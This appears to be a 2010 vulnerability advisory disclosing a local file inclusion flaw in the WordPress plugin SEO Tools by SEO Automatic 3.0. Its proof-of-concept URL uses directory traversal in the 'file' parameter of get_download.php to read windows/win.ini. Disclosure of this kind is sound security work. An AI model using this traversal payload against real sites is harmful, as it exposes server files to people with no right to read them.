------------------------------------------------------------------------
Software................WordPress SEO Tools by SEO Automatic 3.0
Vulnerability...........Local File Inclusion
Download................http://wordpress.org/extend/plugins/seo-automatic-seo-tools/
Release Date............11/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A local file inclusion vulnerability in WordPress SEO Tools by SEO
Automatic 3.0 can be exploited to include arbitrary files.


--PoC--

http://localhost/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini